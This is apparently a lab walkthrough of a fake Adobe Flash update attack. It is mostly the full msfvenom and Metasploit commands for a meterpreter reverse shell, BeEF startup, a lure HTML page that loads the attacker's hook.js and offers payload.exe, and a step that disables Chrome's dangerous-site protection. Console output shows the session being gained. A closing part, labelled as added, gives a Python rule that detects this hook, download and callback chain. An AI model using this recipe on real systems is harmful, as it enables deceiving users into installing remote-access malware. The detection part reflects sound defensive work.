- Systems used
Kali Linux
Windows 7
- adobe flash fake update
(kali)
- Generate the payload
# cd /var/www/html
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.27.50 LPORT=4444 \
-f exe -o payload.exe
# ls
```
index.html  payload.exe
```
[TERM1]
# msfconsole
```
msf > load msgrpc Pass=abc123
[*] MSGRPC Service:  127.0.0.1:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: abc123
[*] Successfully loaded plugin: msgrpc
msf >
msf > use exploit/multi/handler
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set LHOST 192.168.27.50
LHOST => 192.168.27.50
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.27.50    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.27.50:4444
[*] Starting the payload handler...
```
[TERM2]
# cd /usr/share/beef-xss
# ./beef -x
```
[20:43:56][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[20:43:56][*] Browser Exploitation Framework (BeEF) 0.4.7.0-alpha
[20:43:56]    |   Twit: @beefproject
[20:43:56]    |   Site: http://beefproject.com
[20:43:56]    |   Blog: http://blog.beefproject.com
[20:43:56]    |_  Wiki: https://github.com/beefproject/beef/wiki
[20:43:56][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[20:43:57][*] Successful connection with Metasploit.
[20:44:01][*] Loaded 297 Metasploit exploits.
[20:44:01][*] Resetting the database for BeEF.
[20:44:02][*] BeEF is loading. Wait a few seconds...
[20:44:20][*] 13 extensions enabled.
[20:44:20][*] 550 modules enabled.
[20:44:20][*] 3 network interfaces were detected.
[20:44:20][+] running on network interface: 127.0.0.1
[20:44:20]    |   Hook URL: http://127.0.0.1:3000/hook.js
[20:44:20]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[20:44:20][+] running on network interface: 192.168.17.50
[20:44:20]    |   Hook URL: http://192.168.17.50:3000/hook.js
[20:44:20]    |_  UI URL:   http://192.168.17.50:3000/ui/panel
[20:44:20][+] running on network interface: 192.168.27.50
[20:44:20]    |   Hook URL: http://192.168.27.50:3000/hook.js
[20:44:20]    |_  UI URL:   http://192.168.27.50:3000/ui/panel
[20:44:20][*] RESTful API key: 4633f1e85c608a41c26864e550860f9372997d36
[20:44:20][*] HTTP Proxy: http://127.0.0.1:6789
[20:44:20][*] BeEF server started (press control+c to stop)
```
[TERM3]
# cd /var/www/html
# vi index.html
```
<!DOCTYPE html>
<html>
<head>
<title>Adobe flash</title>
<!-- Loads the BeEF hook from the BeEF server started in TERM2 -->
<script src="http://192.168.27.50:3000/hook.js"></script>
</head>
<body><center>
<img src="adobe.png" alt="adobe" width="204" height="204">
<p>
<input type="button" name="btnDownload" value="Update" onclick="window.open('payload.exe','download'); return false;"/>
</p>
</center></body>
</html>
```
> Download any suitable image and save it as adobe.png.
# ls
```
adobe.png  index.html  payload.exe
```
# service apache2 restart
# firefox http://192.168.27.50:3000/ui/panel &
ID beef PASS beef
(win7)
Chrome: "chrome://settings/" > Advanced > turn off "Protect you and your device from dangerous sites"
Browse to http://192.168.27.50
> The image and button set up earlier are displayed.
(kali)
Command > Social Engineering > Fake Flash Update > execute
Image : http://192.168.27.50:300/adobe/flash_update.png
Payload : Custom_Payload
Custom Payload URL : http://192.168.27.50/payload.exe
(win7)
> A convincing-looking window pops up, and when INSTALL is clicked
> payload.exe is installed. Running the payload then connects to msfconsole.
(kali)
[TERM1]
```
[*] Sending stage (957487 bytes) to 192.168.27.202
[*] Meterpreter session 1 opened (192.168.27.50:4444 -> 192.168.27.202:49778) at 2017-11-13 21:05:36 +0900

meterpreter >
meterpreter > sysinfo
Computer        : ADMINSTRATOR-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.27.202 - Meterpreter session 1 closed.  Reason: User exit
```
> The session connected and access was obtained.
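
Seen from the victim network, the lab above leaves three ordered events: the browser fetching BeEF's hook.js, an .exe download from the same host, and an outbound TCP connection to that host on a non-web port. The following is an added detection example, not part of the original post; the log format and the sample lines are constructed for illustration.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample events in a hypothetical "time kind client verb target" format.
SAMPLE_LOG = """\
21:03:10 HTTP 192.168.27.202 GET http://192.168.27.50/
21:03:11 HTTP 192.168.27.202 GET http://192.168.27.50:3000/hook.js
21:04:50 HTTP 192.168.27.202 GET http://192.168.27.50/payload.exe
21:05:36 CONN 192.168.27.202 TCP 192.168.27.50:4444
21:06:02 HTTP 192.168.27.77 GET http://update.example.com/setup.exe
21:06:40 HTTP 192.168.27.78 GET http://192.168.27.50:3000/hook.js
"""

CHAIN = ("hook", "exe", "callback")        # order the stages must occur in
SEVERITY = {1: "low", 2: "medium", 3: "high"}
WEB_PORTS = {80, 443}

def classify(kind, target):
    """Map one event to (remote_host, stage), or None if it is not of interest."""
    if kind == "HTTP":
        url = urlsplit(target)
        path = url.path.lower()
        if path.endswith("/hook.js"):      # hook path shown in the BeEF startup output
            return url.hostname, "hook"
        if path.endswith(".exe"):
            return url.hostname, "exe"
    elif kind == "CONN":
        host, _, port = target.rpartition(":")
        if port.isdigit() and int(port) not in WEB_PORTS:
            return host, "callback"
    return None

def detect(log_text):
    """Return {(client, remote_host): severity} for clients that entered the chain."""
    progress = defaultdict(int)            # (client, host) -> stages matched so far
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue
        hit = classify(fields[1], fields[4])
        if hit is None:
            continue
        key = (fields[2], hit[0])
        # Advance only when this event is the next expected stage for this pair.
        if progress[key] < len(CHAIN) and CHAIN[progress[key]] == hit[1]:
            progress[key] += 1
    return {k: SEVERITY[n] for k, n in progress.items() if n}

if __name__ == "__main__":
    for pair, sev in detect(SAMPLE_LOG).items():
        print(sev, *pair)
```

An .exe download with no preceding hook fetch (the 192.168.27.77 line) is deliberately not reported, so ordinary software downloads do not trigger the rule.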